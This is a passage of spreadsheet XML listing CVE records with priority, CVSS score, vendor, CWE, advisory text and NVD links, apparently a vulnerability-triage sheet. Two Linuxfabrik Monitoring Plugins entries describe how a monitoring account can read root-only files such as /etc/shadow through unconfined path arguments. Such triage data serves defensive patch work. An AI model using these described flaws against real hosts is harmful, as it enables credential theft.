    <row r="1827">
      <c r="A1827" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72945</t>
        </is>
      </c>
      <c r="C1827" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1827" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1827" s="5" t="inlineStr"/>
      <c r="F1827" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1827" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1827" s="5" t="inlineStr"/>
      <c r="I1827" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1827" s="5" t="inlineStr"/>
      <c r="K1827" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L1827" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Task Scheduler allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72945</t>
        </is>
      </c>
    </row>
    <row r="1828">
      <c r="A1828" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72964</t>
        </is>
      </c>
      <c r="C1828" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1828" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1828" s="5" t="inlineStr"/>
      <c r="F1828" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1828" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1828" s="5" t="inlineStr"/>
      <c r="I1828" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1828" s="5" t="inlineStr"/>
      <c r="K1828" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1828" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Internet Connection Sharing (ICS) allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M1828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72964</t>
        </is>
      </c>
    </row>
    <row r="1829">
      <c r="A1829" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72966</t>
        </is>
      </c>
      <c r="C1829" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1829" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1829" s="5" t="inlineStr"/>
      <c r="F1829" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1829" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1829" s="5" t="inlineStr"/>
      <c r="I1829" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1829" s="5" t="inlineStr"/>
      <c r="K1829" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1829" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Remote Access Connection Manager allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M1829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72966</t>
        </is>
      </c>
    </row>
    <row r="1830">
      <c r="A1830" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73004</t>
        </is>
      </c>
      <c r="C1830" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1830" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1830" s="5" t="inlineStr"/>
      <c r="F1830" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1830" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1830" s="5" t="inlineStr"/>
      <c r="I1830" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1830" s="5" t="inlineStr"/>
      <c r="K1830" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1830" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Autopilot allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M1830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73004</t>
        </is>
      </c>
    </row>
    <row r="1831">
      <c r="A1831" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73008</t>
        </is>
      </c>
      <c r="C1831" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1831" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1831" s="5" t="inlineStr"/>
      <c r="F1831" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1831" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H183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831" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1831" s="5" t="inlineStr"/>
      <c r="K1831" s="5" t="inlineStr">
        <is>
          <t>CWE-359</t>
        </is>
      </c>
      <c r="L1831" s="5" t="inlineStr">
        <is>
          <t>Exposure of private personal information to an unauthorized actor in Windows Biometric Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73008</t>
        </is>
      </c>
    </row>
    <row r="1832">
      <c r="A1832" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73973</t>
        </is>
      </c>
      <c r="C1832" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1832" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1832" s="5" t="inlineStr"/>
      <c r="F1832" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1832" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H1832" s="5" t="inlineStr"/>
      <c r="I1832" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1832" s="5" t="inlineStr"/>
      <c r="K1832" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-269</t>
        </is>
      </c>
      <c r="L1832" s="5" t="inlineStr">
        <is>
          <t>Linuxfabrik Monitoring Plugins provides monitoring plugins for Icinga, Nagios, and related systems. Prior to version 7.0.0, check-plugins/logfile/logfile accepted a free-form --filename path and opened it as root when invoked through the shipped nagios or icinga sudoers allowlist, without confining the resolved path to /var/log. An attacker who controls the monitoring account can select a root-readable file such as /etc/shadow and use --warning-regex . while leaving SUPPRESS_OUTPUT false, causing each nonempty line to be collected in warn_matches and returned through lib.base.oao(). The vulnerable flow passes the expanded scan_path directly to open(), and neither real-path containment nor an allowlist protects the sink. The same fix also confines mysql-logfile and openvpn-client-list paths, allows only documented log roots, and resolves symlinks and parent-directory traversal before checking containment. This issue is fixed in version 7.0.0.</t>
        </is>
      </c>
      <c r="M1832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73973</t>
        </is>
      </c>
    </row>
    <row r="1833">
      <c r="A1833" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73974</t>
        </is>
      </c>
      <c r="C1833" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1833" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1833" s="5" t="inlineStr"/>
      <c r="F1833" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1833" s="5" t="inlineStr">
        <is>
          <t>oracle, python</t>
        </is>
      </c>
      <c r="H1833" s="5" t="inlineStr"/>
      <c r="I1833" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1833" s="5" t="inlineStr"/>
      <c r="K1833" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-269</t>
        </is>
      </c>
      <c r="L1833" s="5" t="inlineStr">
        <is>
          <t>linuxfabrik-lib provides Python modules for database access, caching, shell execution, and API integrations, and Linuxfabrik Monitoring Plugins uses its shared testing helper across check plugins. Prior to linuxfabrik-lib 6.1.0 and Linuxfabrik Monitoring Plugins 7.0.0, lib.lftest.test() treated the first or second element of a --test CSV argument as a filesystem path and returned the file contents as simulated standard output or standard error without path confinement. The hidden but production-accessible --test argument was accepted by sudo-authorized plugins, so an attacker controlling the nagios or icinga account could use check-plugins/deb-updates/deb-updates with its default QUERY=1 to disclose every line of a root-readable file. Approximately 22 other plugins exposed filtered content or a root file existence and readability oracle through the same helper, while check-plugins/network-bonding/network-bonding and check-plugins/openstack-swift-stat/openstack-swift-stat had direct read paths that bypassed the helper. The library fix confines fixture reads to the invoking plugin's unit-test directory and refuses unsafe anchors, and the plugin fix routes the two bypasses through that helper. These issues are fixed in linuxfabrik-lib 6.1.0 and Linuxfabrik Monitoring Plugins 7.0.0.</t>
        </is>
      </c>
      <c r="M1833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73974</t>
        </is>
      </c>
    </row>
    <row r="1834">
      <c r="A1834" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77491</t>
        </is>
      </c>
      <c r="C1834" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1834" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1834" s="5" t="inlineStr"/>
      <c r="F1834" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1834" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1834" s="5" t="inlineStr"/>
      <c r="I1834" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1834" s="5" t="inlineStr"/>
      <c r="K1834" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1834" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows GDI allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77491</t>
        </is>
      </c>
    </row>
    <row r="1835">
      <c r="A1835" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78454</t>
        </is>
      </c>
      <c r="C1835" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1835" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1835" s="5" t="inlineStr"/>
      <c r="F1835" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1835" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1835" s="5" t="inlineStr"/>
      <c r="I1835" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1835" s="5" t="inlineStr"/>
      <c r="K1835" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1835" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78454</t>
        </is>
      </c>
    </row>
    <row r="1836">
      <c r="A1836" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78506</t>
        </is>
      </c>
      <c r="C1836" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1836" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1836" s="5" t="inlineStr"/>
      <c r="F1836" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1836" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1836" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I1836" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1836" s="5" t="inlineStr"/>
      <c r="K1836" s="5" t="inlineStr">
        <is>
          <t>CWE-170</t>
        </is>
      </c>
      <c r="L1836" s="5" t="inlineStr">
        <is>
          <t>Improper null termination in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78506</t>
        </is>
      </c>
    </row>
    <row r="1837">
      <c r="A1837" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78513</t>
        </is>
      </c>
      <c r="C1837" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1837" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1837" s="5" t="inlineStr"/>
      <c r="F1837" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1837" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1837" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="I1837" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1837" s="5" t="inlineStr"/>
      <c r="K1837" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1837" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78513</t>
        </is>
      </c>
    </row>
    <row r="1838">
      <c r="A1838" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79910</t>
        </is>
      </c>
      <c r="C1838" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1838" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1838" s="5" t="inlineStr"/>
      <c r="F1838" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1838" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1838" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1838" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1838" s="5" t="inlineStr"/>
      <c r="K1838" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1838"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1838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79910</t>
        </is>
      </c>
    </row>
    <row r="1839">
      <c r="A1839" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80160</t>
        </is>
      </c>
      <c r="C1839" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1839" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1839" s="5" t="inlineStr"/>
      <c r="F1839" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1839" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1839" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1839" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1839" s="5" t="inlineStr"/>
      <c r="K1839" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1839"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1839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80160</t>
        </is>
      </c>
    </row>
    <row r="1840">
      <c r="A1840" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80162</t>
        </is>
      </c>
      <c r="C1840" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1840" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1840" s="5" t="inlineStr"/>
      <c r="F1840" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1840" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1840" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1840" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1840" s="5" t="inlineStr"/>
      <c r="K1840" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1840" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M1840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80162</t>
        </is>
      </c>
    </row>
    <row r="1841">
      <c r="A1841" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81387</t>
        </is>
      </c>
      <c r="C1841" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1841" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1841" s="5" t="inlineStr"/>
      <c r="F1841" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1841" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1841" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1841" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1841" s="5" t="inlineStr"/>
      <c r="K1841" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L1841" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81387</t>
        </is>
      </c>
    </row>
    <row r="1842">
      <c r="A1842" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81390</t>
        </is>
      </c>
      <c r="C1842" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1842" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1842" s="5" t="inlineStr"/>
      <c r="F1842" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1842" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1842" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t>
        </is>
      </c>
      <c r="I1842" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1842" s="5" t="inlineStr"/>
      <c r="K1842" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1842" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81390</t>
        </is>
      </c>
    </row>
    <row r="1843">
      <c r="A1843" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81391</t>
        </is>
      </c>
      <c r="C1843" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1843" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1843" s="5" t="inlineStr"/>
      <c r="F1843" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1843" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1843" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1843" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1843" s="5" t="inlineStr"/>
      <c r="K1843" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L1843" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81391</t>
        </is>
      </c>
    </row>
    <row r="1844">
      <c r="A1844" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81392</t>
        </is>
      </c>
      <c r="C1844" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1844" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1844" s="5" t="inlineStr"/>
      <c r="F1844" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1844" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1844" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1844" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1844" s="5" t="inlineStr"/>
      <c r="K1844" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="L1844" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81392</t>
        </is>
      </c>
    </row>
    <row r="1845">
      <c r="A1845" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81393</t>
        </is>
      </c>
      <c r="C1845" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1845" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1845" s="5" t="inlineStr"/>
      <c r="F1845" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1845" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1845" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1845" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1845" s="5" t="inlineStr"/>
      <c r="K1845" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1845" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81393</t>
        </is>
      </c>
    </row>
    <row r="1846">
      <c r="A1846" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81394</t>
        </is>
      </c>
      <c r="C1846" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1846" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1846" s="5" t="inlineStr"/>
      <c r="F1846" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1846" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1846" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1846" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1846" s="5" t="inlineStr"/>
      <c r="K1846" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L1846" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81394</t>
        </is>
      </c>
    </row>
    <row r="1847">
      <c r="A1847" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81395</t>
        </is>
      </c>
      <c r="C1847" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1847" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1847" s="5" t="inlineStr"/>
      <c r="F1847" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1847" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1847" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1847" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1847" s="5" t="inlineStr"/>
      <c r="K1847" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1847" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81395</t>
        </is>
      </c>
    </row>
    <row r="1848">
      <c r="A1848" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81399</t>
        </is>
      </c>
      <c r="C1848" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1848" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1848" s="5" t="inlineStr"/>
      <c r="F1848" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1848" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1848" s="5" t="inlineStr">
        <is>
